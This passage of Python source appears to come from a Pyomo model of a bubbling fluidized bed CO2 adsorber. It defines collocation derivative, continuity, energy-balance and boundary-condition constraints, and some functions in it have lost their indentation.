    return m.Kgbulk[it, jt, ix, jx, k] == \
        m.K_d * (ce_total - cb_total) * m.yb[it, jt, ix, jx, k]
# Hgbulk
def i2_rule(m, it, jt, ix, jx):
    """Bulk gas enthalpy interchange Hgbulk: the Kgbulk-style total
    concentration difference times molar heat capacity and Tgb."""
    if not (0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x):
        return Constraint.Skip
    ce_total = sum(m.ce[it, jt, ix, jx, kx] for kx in m.sp)
    cb_total = sum(m.cb[it, jt, ix, jx, kx] for kx in m.sp)
    return m.Hgbulk[it, jt, ix, jx] == \
        m.K_d * (ce_total - cb_total) * m.cpg_mol * m.Tgb[it, jt, ix, jx]
# Ksbulk
# oddly derivative-looking term here and in the next one
# definitely derivatives e19 and e20 from the BFB SS paper
def i3_rule(m, it, kt, ix, kx, c):
    """Bulk solids species interchange Ksbulk (eq. e19 of the BFB SS paper).

    -Ax * dJc/dx, with the derivative taken as the Lagrange collocation
    combination (weights lydot) of the solids flux Jc over the element's
    points, times the emulsion solids loading ne of species c.
    """
    if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
        return m.Ksbulk[it, kt, ix, kx, c] == \
               -m.Ax * sum(m.lydot[jx, kx] * m.Jc[it, kt, ix, jx] for jx in m.cp_x if 0 < jx <= m.ncp_x) * m.ne[it, kt, ix, kx, c]
    else:
        return Constraint.Skip
# Hsbulk
# m.Jc[it, jt, ix, jx]-m.Jc[i-1]
def i4_rule(m, it, kt, ix, kx):
    """Bulk solids enthalpy interchange Hsbulk (eq. e20 of the BFB SS paper).

    Mirrors i3_rule (Ksbulk): -Ax * dJc/dx, with dJc/dx as the Lagrange
    collocation combination (weights lydot) of the solids flux Jc, times
    the emulsion solids enthalpy hse at the evaluation point.
    """
    # Improvement: removed dead commented-out finite-difference variant
    # that shadowed this rule; behavior unchanged.
    if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
        return m.Hsbulk[it, kt, ix, kx] == \
               -m.Ax * sum(m.lydot[jx, kx] * m.Jc[it, kt, ix, jx]
                           for jx in m.cp_x if 0 < jx <= m.ncp_x) * m.hse[it, kt, ix, kx]
    else:
        return Constraint.Skip
# db
def i5_rule(m, it, jt, ix, jx):
    """Tie the working bubble diameter db to its correlation value dbu."""
    if not (0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x):
        return Constraint.Skip
    return m.db[it, jt, ix, jx] == m.dbu[it, jt, ix, jx]
# vb
def i6_rule(m, it, jt, ix, jx):
    # Bubble rise velocity correlation:
    #   vb = 1.55*((vg - vmf) + 14.1*(db + 0.005))*Dte**0.32 + vbr
    # NOTE(review): 1.55, 14.1, 0.005, 0.32 are empirical correlation
    # parameters — confirm against the cited BFB model source.
    if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
        return m.vb[it, jt, ix, jx] == \
               1.55 * ((m.vg[it, jt, ix, jx] - m.vmf[it, jt]) + 14.1 * (m.db[it, jt, ix, jx] + 0.005)) * (
               m.Dte ** 0.32) + m.vbr[it, jt, ix, jx]
    else:
        return Constraint.Skip
# ed
def i7_rule(m, it, jt, ix, jx):
    # Emulsion voidage correlation, written cross-multiplied (no division)
    # so the solver never divides by a variable:
    #   (1 - emf)*dp^0.1*gc^0.118*2.05*l^0.043 == 2.54*mug^0.066*(1 - ed)
    # NOTE(review): exponents/constants are empirical — confirm against the
    # source correlation.
    if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
        return (1 - m.emf) * ((m.dp ** 0.1) * (m.gc ** 0.118) * 2.05 * (m.l[ix, jx] ** 0.043)) == \
               2.54 * (m.mug ** 0.066) * (1. - m.ed[it, jt, ix, jx])
    else:
        return Constraint.Skip
# ve
def i8_rule(m, it, jt, ix, jx):
    # Emulsion gas velocity correlation, cross-multiplied to avoid division:
    #   ve * dp^0.568 * gc^0.663 * (0.08518*(rhos - rhog) + 19.09) * l^0.244
    #     == vmf * 188 * 1.02 * mug^0.371
    # NOTE(review): empirical constants/exponents — confirm against source.
    if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
        return m.ve[it, jt, ix, jx] * ((m.dp ** 0.568) * (m.gc ** 0.663) * (0.08518 * (m.rhos - m.rhog[it, jt, ix, jx]) + 19.09) * ((m.l[ix, jx]) ** 0.244)) == \
               m.vmf[it, jt] * 188. * 1.02 * (m.mug ** 0.371)
    else:
        return Constraint.Skip
# exchanger pressure drop
# HXIn_h
def e1_rule(m, it, jt):
    """HX inlet enthalpy: linearized correlation in HXIn_P (around 1.3)
    and HXIn_T (around 60 C above 273.15 K)."""
    if not 0 < jt <= m.ncp_t:
        return Constraint.Skip
    pressure_term = -2.9863e-6 * (m.HXIn_P - 1.3)
    temperature_term = 7.3855e-05 * (m.HXIn_T - 60 - 273.15)
    return m.HXIn_h[it, jt] == -0.2831 + pressure_term + temperature_term
# hsint
def e5_rule(m, it, jt):
    # Solids inlet enthalpy hsint: per-species adsorbed-phase terms
    # (sensible heat cpgcst*(T-273.15) plus reaction enthalpies dH1..dH3),
    # scaled by 1E-3, plus the sorbent sensible heat cps*(T-273.15).
    # NOTE(review): the 'n' term multiplies m.cpgcst['c'] (not ['n']), and
    # the first term weights (nin['h'] + nin['c']) by cpgcst['h'] — both
    # look like possible copy-paste slips; confirm against the model
    # derivation before changing anything.
    if 0 < jt <= m.ncp_t:
        return m.hsint[it, jt] == \
               ((m.nin['h'] + m.nin['c']) * (m.cpgcst['h'] * (m.SolidIn_T - 273.15) + m.dH1) + m.nin['c'] * (m.cpgcst['c'] * (m.SolidIn_T - 273.15) + m.dH2) + m.nin['n'] * (m.cpgcst['c'] * (m.SolidIn_T - 273.15) + m.dH3)) * 1E-3 + m.cps * (m.SolidIn_T - 273.15)
    else:
        return Constraint.Skip
# cein
def fdvar_x_cein_(m, it, kt, ix, kx, c):
    """Spatial collocation derivative of cein: dcein_dx equals the
    Lagrange-derivative combination (weights ldot_x) of cein over the
    element's collocation points."""
    if not (0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x):
        return Constraint.Skip
    derivative = sum(m.ldot_x[jx, kx] * m.cein[it, kt, ix, jx, c]
                     for jx in m.cp_x if jx <= m.ncp_x)
    return m.dcein_dx[it, kt, ix, kx, c] == derivative
# ecwin
def fdvar_x_ecwin_(m, it, kt, ix, kx):
if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
return m.decwin_dx[it, kt, ix, kx] == \
sum(m.ldot_x[jx, kx] * m.ecwin[it, kt, ix, jx] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# eein
def fdvar_x_eein_(m, it, kt, ix, kx):
if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
return m.deein_dx[it, kt, ix, kx] == \
sum(m.ldot_x[jx, kx] * m.eein[it, kt, ix, jx] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# hxh:q
def fdvar_x_hxh_(m, it, kt, ix, kx): #
if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
return m.dhxh_dx[it, kt, ix, kx] == \
sum(m.ldot_x[jx, kx] * m.hxh[it, kt, ix, jx] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# Phx
def fdvar_x_phx_(m, it, kt, ix, kx): #
if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
return m.dPhx_dx[it, kt, ix, kx] == \
sum(m.ldot_x[jx, kx] * m.Phx[it, kt, ix, jx] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# ccwin
def fdvar_x_ccwin_(m, it, kt, ix, kx, c):
if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
return m.dccwin_dx[it, kt, ix, kx, c] == \
sum(m.ldot_x[jx, kx] * m.ccwin[it, kt, ix, jx, c] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# z
def fdvar_z_(m, it, kt, ix, kx):
if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
return m.dz_dx[it, kt, ix, kx] == sum(
m.ldot_x[jx, kx] * m.z[it, kt, ix, jx] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# ceini0
def fcp_x_cein(m, it, kt, ix, c):
if 0 < kt <= m.ncp_t and ix < m.nfe_x:
return m.cein[it, kt, ix + 1, 0, c] == \
sum(m.l1_x[jx] * m.cein[it, kt, ix, jx, c] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# ecwini0
def fcp_x_ecwin(m, it, kt, ix):
if 0 < kt <= m.ncp_t and ix < m.nfe_x:
return m.ecwin[it, kt, ix + 1, 0] == \
sum(m.l1_x[jx] * m.ecwin[it, kt, ix, jx] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# eeini0
def fcp_x_eein(m, it, kt, ix):
if 0 < kt <= m.ncp_t and ix < m.nfe_x:
return m.eein[it, kt, ix + 1, 0] == \
sum(m.l1_x[jx] * m.eein[it, kt, ix, jx] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# hxhi0
def fcp_x_hxh(m, it, kt, ix):
if 0 < kt <= m.ncp_t and ix < m.nfe_x:
return m.hxh[it, kt, ix + 1, 0] == \
sum(m.l1_x[jx] * m.hxh[it, kt, ix, jx] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# Phxi0
def fcp_x_phx(m, it, kt, ix):
if 0 < kt <= m.ncp_t and ix < m.nfe_x:
return m.Phx[it, kt, ix + 1, 0] == \
sum(m.l1_x[jx] * m.Phx[it, kt, ix, jx] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# ccwini0
def fcp_x_ccwin(m, it, kt, ix, c):
if 0 < kt <= m.ncp_t and ix < m.nfe_x:
return m.ccwin[it, kt, ix + 1, 0, c] == \
sum(m.l1_x[jx] * m.ccwin[it, kt, ix, jx, c] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# zi0
def fcp_z_(m, it, kt, ix):
if 0 < kt <= m.ncp_t and ix < m.nfe_x:
return m.z[it, kt, ix + 1, 0] == sum(m.l1_x[jx] * m.z[it, kt, ix, jx] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
def fzl_cein(m, it, kt, c):
if 0 < kt <= m.ncp_t:
return m.cein_l[it, kt, c] == sum(m.l1_x[jx] * m.cein[it, kt, m.nfe_x, jx, c] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
def fzl_ecwin(m, it, kt):
if 0 < kt <= m.ncp_t:
return m.ecwin_l[it, kt] == sum(m.l1_x[jx] * m.ecwin[it, kt, m.nfe_x, jx] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
def fzl_eein(m, it, kt):
if 0 < kt <= m.ncp_t:
return m.eein_l[it, kt] == sum(m.l1_x[jx] * m.eein[it, kt, m.nfe_x, jx] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
def fzl_hxh(m, it, kt):
if 0 < kt <= m.ncp_t:
return m.hxh_l[it, kt] == sum(m.l1_x[jx] * m.hxh[it, kt, m.nfe_x, jx] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
def fzl_phx(m, it, kt):
if 0 < kt <= m.ncp_t:
return m.Phx_l[it, kt] == sum(m.l1_x[jx] * m.Phx[it, kt, m.nfe_x, jx] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
def fzl_ccwin(m, it, kt, c):
if 0 < kt <= m.ncp_t:
return m.ccwin_l[it, kt, c] == sum(m.l1_x[jx] * m.ccwin[it, kt, m.nfe_x, jx, c] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# def fzl_z(m, it, kt):
# if 0 < kt <= m.ncp_t:
# return m.z_l[it, kt] ==
# else:
# return Constraint.Skip
# hse_l
def fyl_hse(m, it, jt):
if 0 < jt <= m.ncp_t:
return m.hse_l[it, jt] == sum(m.l1y[jx] * m.hse[it, jt, m.nfe_x, jx] for jx in m.cp_x if 0 < jx <= m.ncp_x)
else:
return Constraint.Skip
# ne_l
def fyl_ne(m, it, jt, c):
if 0 < jt <= m.ncp_t:
return m.ne_l[it, jt, c] == sum(m.l1y[jx] * m.ne[it, jt, m.nfe_x, jx, c] for jx in m.cp_x if 0 < jx <= m.ncp_x)
else:
return Constraint.Skip
# cb_l
def fzl_cb(m, it, jt, c):
if 0 < jt <= m.ncp_t:
return m.cb_l[it, jt, c] == sum(m.l1_x[jx] * m.cb[it, jt, m.nfe_x, jx, c] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# ccapture
def cc_rule(m, it, jt):
    """CO2 capture fraction: 1 - (species 'c' leaving) / (species 'c' fed)."""
    if not 0 < jt <= m.ncp_t:
        return Constraint.Skip
    out_flow = m.GasOut_F[it, jt] * m.GasOut_z[it, jt, 'c']
    in_flow = m.GasIn_F[it] * m.GasIn_z[it, 'c']
    return m.c_capture[it, jt] == 1 - out_flow / in_flow
# 1st order Derivative variables in space
# ddx vb
def fdvar_x_vg_(m, it, kt, ix, kx):
if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
return m.dvg_dx[it, kt, ix, kx] == \
sum(m.ldot_x[jx, kx] * m.vg[it, kt, ix, jx] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# ddx Gb
def fdvar_x_Gb_(m, it, kt, ix, kx):
if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
return m.dGb_dx[it, kt, ix, kx] == \
sum(m.ldot_x[jx, kx] * m.Gb[it, kt, ix, jx] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# ddx cb
def fdvar_x_cb_(m, it, kt, ix, kx, c):
if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
return m.dcb_dx[it, kt, ix, kx, c] == \
sum(m.ldot_x[jx, kx] * m.cb[it, kt, ix, jx, c] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# ddx Tb
def fdvar_x_Tgb_(m, it, kt, ix, kx):
if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
return m.dTgb_dx[it, kt, ix, kx] == \
sum(m.ldot_x[jx, kx] * m.Tgb[it, kt, ix, jx] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# ddx P
def fdvar_x_P_(m, it, kt, ix, kx):
if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
return m.dP_dx[it, kt, ix, kx] == \
sum(m.ldot_x[jx, kx] * m.P[it, kt, ix, jx] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# Continuation in space
# vb
def fcp_x_vb(m, it, kt, ix):
if 0 < kt <= m.ncp_t and ix < m.nfe_x:
return m.vg[it, kt, ix + 1, 0] == \
sum(m.l1_x[jx] * m.vg[it, kt, ix, jx] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# Gb
def fcp_x_Gb(m, it, kt, ix):
if 0 < kt <= m.ncp_t and ix < m.nfe_x:
return m.Gb[it, kt, ix + 1, 0] == \
sum(m.l1_x[jx] * m.Gb[it, kt, ix, jx] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# cb
def fcp_x_cb(m, it, kt, ix, c):
if 0 < kt <= m.ncp_t and ix < m.nfe_x:
return m.cb[it, kt, ix + 1, 0, c] == \
sum(m.l1_x[jx] * m.cb[it, kt, ix, jx, c] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# Tgb
def fcp_x_Tgb(m, it, kt, ix):
if 0 < kt <= m.ncp_t and ix < m.nfe_x:
return m.Tgb[it, kt, ix + 1, 0] == \
sum(m.l1_x[jx] * m.Tgb[it, kt, ix, jx] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# P
def fcp_x_P(m, it, kt, ix):
if 0 < kt <= m.ncp_t and ix < m.nfe_x:
return m.P[it, kt, ix + 1, 0] == \
sum(m.l1_x[jx] * m.P[it, kt, ix, jx] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# 2nd order Derivative variables in space
# d2dx2 vb
def fdvar_x_dvg_dx_(m, it, kt, ix, kx):
if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
return m.dvgx_dx[it, kt, ix, kx] == \
sum(m.ldot_x[jx, kx] * m.vgx[it, kt, ix, jx] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# d2dx2 cb
def fdvar_x_dcb_dx_(m, it, kt, ix, kx, c):
if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
return m.dcbx_dx[it, kt, ix, kx, c] == \
sum(m.ldot_x[jx, kx] * m.cbx[it, kt, ix, jx, c] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# d2dx2 Tb
def fdvar_x_dTgb_dx_(m, it, kt, ix, kx):
if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
return m.dTgbx_dx[it, kt, ix, kx] == \
sum(m.ldot_x[jx, kx] * m.Tgbx[it, kt, ix, jx] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# Continuation in space d2dx2
# dvb_dx
def fcp_x_dvb_dx(m, it, kt, ix):
if 0 < kt <= m.ncp_t and ix < m.nfe_x:
return m.vgx[it, kt, ix + 1, 0] == \
sum(m.l1_x[jx] * m.vgx[it, kt, ix, jx] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# dcb_dx
def fcp_x_dcb_dx(m, it, kt, ix, c):
if 0 < kt <= m.ncp_t and ix < m.nfe_x:
return m.cbx[it, kt, ix + 1, 0, c] == \
sum(m.l1_x[jx] * m.cbx[it, kt, ix, jx, c] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# dTgb_dx
def fcp_x_dTgb_dx(m, it, kt, ix):
if 0 < kt <= m.ncp_t and ix < m.nfe_x:
return m.Tgbx[it, kt, ix + 1, 0] == \
sum(m.l1_x[jx] * m.Tgbx[it, kt, ix, jx] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# tvar
# Time discretization Gb
def fdvar_t_Gb(m, it, kt, ix, kx):
    # Time-collocation derivative equation: dvg_dt equals the Lagrange
    # derivative combination (weights ldot_t) of vg over the element's
    # time collocation points.
    # NOTE(review): the rule name refers to Gb, but the variables are
    # vg/dvg_dt — confirm the intended name/variable pairing.
    if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
        return m.dvg_dt[it, kt, ix, kx] == \
               sum(m.ldot_t[jt, kt] * m.vg[it, jt, ix, kx] for jt in m.cp_t if jt <= m.ncp_t)
    else:
        return Constraint.Skip
def fcp_t_Gb(m, it, ix, kx):
    # Continuity of vg across time finite elements, written as a RESIDUAL
    # (value at the next element's point 0 minus the interpolated
    # end-of-element value, weights l1_t). Paired with Expression.Skip,
    # so this is an Expression rule, not a Constraint rule — hence the
    # deliberate '-' instead of '=='.
    # NOTE(review): the name says Gb but the variable is vg — confirm.
    if it < m.nfe_t and 0 < kx <= m.ncp_x:
        return m.vg[it + 1, 0, ix, kx] - \
               sum(m.l1_t[jt] * m.vg[it, jt, ix, kx] for jt in m.cp_t if jt <= m.ncp_t)
    else:
        return Expression.Skip
# gas bubble
def ngb_rule(m, it, jt, ix, jx, c):
    """Bubble-phase species holdup: Ngb = delta * cb for species c."""
    if not (0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x):
        return Constraint.Skip
    return m.Ngb[it, jt, ix, jx, c] == \
        m.delta[it, jt, ix, jx] * m.cb[it, jt, ix, jx, c]
def hgb_rule(m, it, jt, ix, jx):
    """Bubble-phase gas enthalpy holdup: Hgb = delta * cpg_mol * Tgb."""
    if not (0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x):
        return Constraint.Skip
    return m.Hgb[it, jt, ix, jx] == \
        m.delta[it, jt, ix, jx] * m.cpg_mol * m.Tgb[it, jt, ix, jx]
# Momentum balance
def de_Gb_rule(m, it, jt, ix, jx):
    """Momentum balance, reduced to a static pressure-drop relation:

        0 = -dP/dx * 1e5 - hi_x * (1 - e) * rhos * gc

    The 1e5 factor converts the pressure variable to the gravity-term
    units (NOTE(review): consistent with P being in bar — confirm), and
    hi_x carries the finite-element length scaling of the bed-weight term.
    """
    # Improvement: removed ~10 lines of dead commented-out dynamic
    # formulations (which also contained a Gb[it, jt, ix, jt] index typo);
    # the active constraint is unchanged.
    if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
        return 0.0 == -m.dP_dx[it, jt, ix, jx] * 100000 - \
            m.hi_x[ix] * (1 - m.e[it, jt, ix, jx]) * m.rhos * m.gc
    else:
        return Constraint.Skip
def dum_dex_vg_rule(m, it, jt, ix, jx):
    """Link the scaled first derivative: dvg_dx = hi_x * vgx, where vgx is
    the helper variable used for the second spatial derivative."""
    if not (0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x):
        return Constraint.Skip
    return m.dvg_dx[it, jt, ix, jx] == m.hi_x[ix] * m.vgx[it, jt, ix, jx]
# Continuity (mole balance) species
def de_ngb_rule(m, it, jt, ix, jx, k):
    """Bubble-phase species continuity, scaled by hi_x (space) and hi_t (time).

    hi_x * dNgb/dt = - convection (vg * dcb/dx + cb * dvg/dx, product rule)
                     - axial dispersion (D * d(cbx)/dx; cbx is the scaled
                       first derivative of cb, see dum_dex_cb_rule)
                     - bubble->cloud interchange (Kbc * (cb - cc))
                     + bulk interchange (Kgbulk / Ax).
    """
    if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
        return m.hi_x[ix] * m.dNgb_dt[it, jt, ix, jx, k] == \
               -m.hi_t[it] * (m.vg[it, jt, ix, jx] * m.dcb_dx[it, jt, ix, jx, k] + m.cb[it, jt, ix, jx, k] * m.dvg_dx[it, jt, ix, jx]) - \
               m.hi_t[it] * m.D[it, jt, ix, jx, k] * m.dcbx_dx[it, jt, ix, jx, k] - \
               m.hi_t[it] * m.hi_x[ix] * m.delta[it, jt, ix, jx] * m.Kbc[it, jt, ix, jx, k] * (m.cb[it, jt, ix, jx, k] - m.cc[it, jt, ix, jx, k]) + \
               m.hi_t[it] * m.Kgbulk[it, jt, ix, jx, k]/m.Ax
    else:
        return Constraint.Skip
def dum_dex_cb_rule(m, it, jt, ix, jx, c):
    """Link the scaled first derivative: dcb_dx = hi_x * cbx (cbx is the
    helper variable used for the second spatial derivative of cb)."""
    if not (0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x):
        return Constraint.Skip
    return m.dcb_dx[it, jt, ix, jx, c] == m.hi_x[ix] * m.cbx[it, jt, ix, jx, c]
# Energy balance (mole balance)
def de_hgb_rule(m, it, jt, ix, jx):
    """Bubble-phase gas energy balance, scaled by hi_x and hi_t.

    hi_x * dHgb/dt = - convection (cpg_mol/Ax) * (Gb*dTgb/dx + Tgb*dGb/dx)
                     - axial conduction (kg * d(Tgbx)/dx)
                     - bubble->cloud heat interchange (Hbc * (Tgb - Tgc))
                     + bulk enthalpy interchange (Hgbulk / Ax).
    """
    # Bug fix: the convection term indexed Gb as [it, jt, ix, jt] — the
    # 4th index must be the spatial collocation point jx, as in every
    # other use of Gb in this file. Also removed the dead commented-out
    # alternative formulation.
    if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
        return m.hi_x[ix] * m.dHgb_dt[it, jt, ix, jx] == \
               -(m.hi_t[it] * m.cpg_mol/m.Ax) * (
                   m.Gb[it, jt, ix, jx] * m.dTgb_dx[it, jt, ix, jx]
                   + (m.Tgb[it, jt, ix, jx]) * m.dGb_dx[it, jt, ix, jx]) - \
               m.hi_t[it] * m.kg * m.dTgbx_dx[it, jt, ix, jx] - \
               m.hi_t[it] * m.hi_x[ix] * m.delta[it, jt, ix, jx] * m.Hbc[it, jt, ix, jx] * (m.Tgb[it, jt, ix, jx] - m.Tgc[it, jt, ix, jx]) + \
               m.hi_t[it] * m.Hgbulk[it, jt, ix, jx]/m.Ax
    else:
        return Constraint.Skip
def dum_dex_Tgb_rule(m, it, jt, ix, jx):
    """Link the scaled first derivative: dTgb_dx = hi_x * Tgbx (Tgbx is the
    helper variable used for the second spatial derivative of Tgb)."""
    if not (0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x):
        return Constraint.Skip
    return m.dTgb_dx[it, jt, ix, jx] == m.hi_x[ix] * m.Tgbx[it, jt, ix, jx]
# Pressure term
def dpdx_rule(m, it, jt, ix, jx):
    # Ideal-gas relation differentiated in x by the product rule:
    #   dP/dx * 100/8.314 == c_tot * dTgb/dx + Tgb * d(c_tot)/dx
    # where c_tot = sum of bubble-phase species concentrations and 8.314
    # is the gas constant R.
    # NOTE(review): the factor 100 implies P is in bar — confirm units.
    if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
        return (m.dP_dx[it, jt, ix, jx]) * 100/8.314 == \
               sum(m.cb[it, jt, ix, jx, kx] for kx in m.sp) * m.dTgb_dx[it, jt, ix, jx] + \
               (m.Tgb[it, jt, ix, jx]) * sum(m.dcb_dx[it, jt, ix, jx, kx] for kx in m.sp)
    else:
        return Constraint.Skip
# Heat-Exchanger fluid energy balance
# dhxh_dx
def dhxh_rule(m, it, jt, ix, jx):
    # Heat-exchanger fluid energy balance: fluid flow (HXIn_F/3600, per
    # second) times the enthalpy gradient balances the tube heat duty
    # (ht * dThx over Nx tubes, pi*dx tube perimeter, Cr correction),
    # with hi_x carrying the element length.
    # NOTE(review): the 1E-6 factor looks like a W -> MW (or J -> MJ)
    # scaling — confirm against the model's unit conventions.
    if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
        return 0 == (m.HXIn_F / 3600) * m.dhxh_dx[it, jt, ix, jx] - \
               m.hi_x[ix] * 1E-6 * m.pi * m.dx * m.ht[it, jt, ix, jx] * m.dThx[it, jt, ix, jx] * m.Nx * m.Cr
    else:
        return Constraint.Skip
# dPhx_dx
def dphx_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.dPhx_dx[it, jt, ix, jx] == m.hi_x[ix] * m.dPhx + m.hi_x[ix] * m.rhohx * 1E-5
else:
return Constraint.Skip
# Gb0
def bc_Gb0_rule(m, it, jt):
    """Inlet boundary condition: bubble gas flow at the bed bottom
    (ix=1, jx=0) equals the feed flow converted from per-hour to
    per-second."""
    if not 0 < jt <= m.ncp_t:
        return Constraint.Skip
    return m.Gb[it, jt, 1, 0] == m.GasIn_F[it] / 3600
# Tgb0
def bc_Tgb0_rule(m, it, jt):
if 0 < jt <= m.ncp_t:
return m.Tgb[it, jt, 1, 0] == m.GasIn_T[it]
else:
return Constraint.Skip
# cb0
def bc_cb0_rule(m, it, jt, k):
if 0 < jt <= m.ncp_t:
return m.cb[it, jt, 1, 0, k] == m.GasIn_z[it, k] * m.GasIn_P[it] * 100 / (8.314 * (m.GasIn_T[it]))
else:
return Constraint.Skip
# P0
def bc_P0_rule(m, it, jt):
if 0 < jt <= m.ncp_t:
return m.P[it, jt, 1, 0] == m.GasIn_P[it]
else:
return Constraint.Skip
# vg0
def bc_vg0_rule(m, it, jt):
if 0 < jt <= m.ncp_t:
return m.vg[it, jt, 1, 0] == m.GasIn_F[it] / (3600 * m.Ax * m.GasIn_P[it] * 100 / (8.314 * (m.GasIn_T[it])))
else:
return Constraint.Skip
# bcs ddx vars
# vgx_l
def bc_vgx_rule(m, it, jt):
if 0 < jt <= m.ncp_t:
return sum(m.l1_x[jx] * m.vgx[it, jt, m.nfe_x, jx] for jx in m.cp_x if jx <= m.ncp_x) == 0.0
else:
return Constraint.Skip
# cbx_l
def bc_cbx_rule(m, it, jt, c):
if 0 < jt <= m.ncp_t:
return sum(m.l1_x[jx] * m.cbx[it, jt, m.nfe_x, jx, c] for jx in m.cp_x if jx <= m.ncp_x) == 0.0
else:
return Constraint.Skip
# Tgbx_l
def bc_Tgbx_rule(m, it, jt):
if 0 < jt <= m.ncp_t:
return sum(m.l1_x[jx] * m.Tgbx[it, jt, m.nfe_x, jx] for jx in m.cp_x if jx <= m.ncp_x) == 0.0
else:
return Constraint.Skip
# GasOut_F
def e12_rule(m, it, jt):
if 0 < jt <= m.ncp_t:
return sum(m.l1_x[jx] * m.Gb[it, jt, m.nfe_x, jx] for jx in m.cp_x if jx <= m.ncp_x) == m.GasOut_F[it, jt] / 3600
else:
return Constraint.Skip
# GasOut_T
def e13_rule(m, it, jt):
if 0 < jt <= m.ncp_t:
return sum(m.l1_x[jx] * m.Tgb[it, jt, m.nfe_x, jx] for jx in m.cp_x if jx <= m.ncp_x) == m.GasOut_T[it, jt]
else:
return Constraint.Skip
# GasOut_z
def e14_rule(m, it, jt, c):
if 0 < jt <= m.ncp_t:
return m.GasOut_z[it, jt, c] * sum(m.cb_l[it, jt, cx] for cx in m.sp) == m.cb_l[it, jt, c]
else:
return Constraint.Skip
# Sot -- not bc tough
def e20_rule(m, it, jt):
if 0 < jt <= m.ncp_t:
return m.Sit[it, jt] - m.Sot[it, jt] == sum(m.l1_x[jx] * m.z[it, jt, m.nfe_x, jx] for jx in m.cp_x if jx <= m.ncp_x) * m.Ax
else:
return Constraint.Skip
# ccwin_l or cein_l
def bc_mol_rule(m, it, jt, j):
if 0 < jt <= m.ncp_t:
return m.ccwin_l[it, jt, j] * m.Ax + m.Sit[it, jt] * m.nin[j] == m.cein_l[it, jt, j] * m.Ax + m.Sot[it, jt] * m.ne_l[it, jt, j]
else:
return Constraint.Skip
# eein_l or eein_l
def bc_ene_rule(m, it, jt):
if 0 < jt <= m.ncp_t:
